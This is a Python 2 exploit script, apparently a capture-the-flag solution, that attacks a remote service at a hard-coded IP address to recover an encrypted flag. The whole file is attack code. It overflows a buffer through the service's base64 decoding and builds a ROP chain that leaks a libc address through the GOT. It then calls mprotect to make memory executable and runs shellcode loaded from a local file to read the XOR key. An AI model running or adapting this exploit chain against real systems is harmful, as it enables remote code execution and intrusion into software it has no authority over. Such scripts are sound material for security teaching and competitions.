#!/usr/bin/python
import base64
import socket
import struct
import sys

def readuntil(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

def p(v):
    return struct.pack('<Q', v)

def u(v):
    return struct.unpack('<Q', v)[0]

def pd(v):
    return struct.pack('<I', v)

def get_port():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('136.243.194.52', 1024))
    f = s.makefile('rw', bufsize=0)
    port = int(f.readline().split()[5])
    print 'port =', port
    return port

PORT = get_port()
def make_conn():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('136.243.194.52', PORT))
    f = s.makefile('rw', bufsize=0)
    return s, f

def read_until_ok(f):
    data = readuntil(f, '\nOK\n')
    return data[:-4]

def set_filename(f, filename):
    f.write('\x01')
    f.write(pd(len(filename)))
    f.write(filename)
    read_until_ok(f)

def set_data(f, data):
    f.write('\x02')
    f.write(pd(len(data)))
    f.write(data)
    read_until_ok(f)

def set_xor_key(f, data):
    f.write('\x03')
    f.write(pd(len(data)))
    f.write(data)
    read_until_ok(f)

def write_file(f):
    f.write('\x04')
    f.write(pd(0))
    read_until_ok(f)

def read_file(f):
    f.write('\x05')
    f.write(pd(0))
    return read_until_ok(f)

def write_xorred_file(f):
    f.write('\x06')
    f.write(pd(0))
    read_until_ok(f)

def read_xorred_file(f):
    f.write('\x07')
    f.write(pd(0))
    return read_until_ok(f)

def base64_encode_data(f):
    f.write('\x08')
    f.write(pd(0))
    read_until_ok(f)

def base64_decode_data(f, do_read=True):
    f.write('\x09')
    f.write(pd(0))
    if do_read:
        return read_until_ok(f)

s1, f1 = make_conn()
s2, f2 = make_conn()

set_filename(f1, 'flag\0')
encrypted_flag = read_file(f1)

set_data(f1, 'A' * 255)
base64_encode_data(f1)

pop_rdi_ret = 0x401c43
pop_rsi_r15_ret = 0x401c41
write = 0x400AC0
read = 0x400b60
g_state = 0x602620
pop_rbp_ret = 0x400EF8
leave_ret = 0x400f5e
read_got = 0x602520

rop = 'A' * 0x89
rop += p(pop_rdi_ret)
rop += p(4)
rop += p(pop_rsi_r15_ret)
rop += p(read_got)
rop += p(0)
rop += p(write)
rop += p(pop_rsi_r15_ret)
rop += p(g_state)
rop += p(0)
rop += p(read)
rop += p(pop_rbp_ret)
rop += p(g_state - 8)
rop += p(leave_ret)

payload = 'FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'
payload += base64.b64encode(rop).replace('=', 'A')

assert len(payload) <= 512

set_filename(f2, payload[:256])
if len(payload) > 256:
    set_xor_key(f2, payload[256:])

base64_decode_data(f1, False)

read = u(f1.read(8))
libc_base = read - 0xf7470
print 'libc_base =', hex(libc_base)

mprotect = libc_base + 0x101780
pop_rdx_rsi_ret = libc_base + 0x114c19

rop = ''
rop += p(pop_rdx_rsi_ret)
rop += p(7)
rop += p(4096)
rop += p(pop_rdi_ret)
rop += p(g_state & ~0xfff)
rop += p(mprotect)
rop += p(g_state + len(rop) + 8)
rop += open('read_key.bin').read()

f1.write(rop)

readuntil(f1, '\nOK\n')
print 'got connection'

key = f1.read()
print ''.join(chr(ord(x)^ord(y)) for x, y in zip(key, encrypted_flag))